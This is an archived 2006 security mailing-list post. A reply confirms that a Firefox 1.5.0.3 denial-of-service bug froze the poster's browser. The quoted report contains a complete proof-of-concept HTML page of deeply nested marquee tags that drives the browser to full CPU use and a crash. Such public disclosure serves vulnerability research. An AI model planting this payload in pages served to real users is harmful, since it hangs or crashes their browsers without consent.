OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Re: Fire fox dos exploit

From: pagvac (unknown.pentestergmail.com)
Date: Wed May 31 2006 - 08:59:24 CDT


Successfully tested on Firefox 1.5.0.3.

I had to kill my firefox.exe process after half a minute of freezing :-)

On 30 May 2006 12:03:36 -0000, co296aol.com <co296aol.com> wrote:
> I have found a problem which causes denial of service on fire fox browser
>
>
> Creadit:to n00b for finding this bug..
>
>
> the problem lie's in the
>
>
> <marquee> html tag uses 100% cpu and crash's the browser..
>
>
> Following proof of concept available
>
>
> <html>
>
> <head>
>
> <title>Credit to n00b..</title>
>
> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
>
> </head>
>
>
> <body>
>
> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marq
 ue
> e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
>
> </body>
>
> </html>
>
>

--
pagvac
[http://ikwt.com]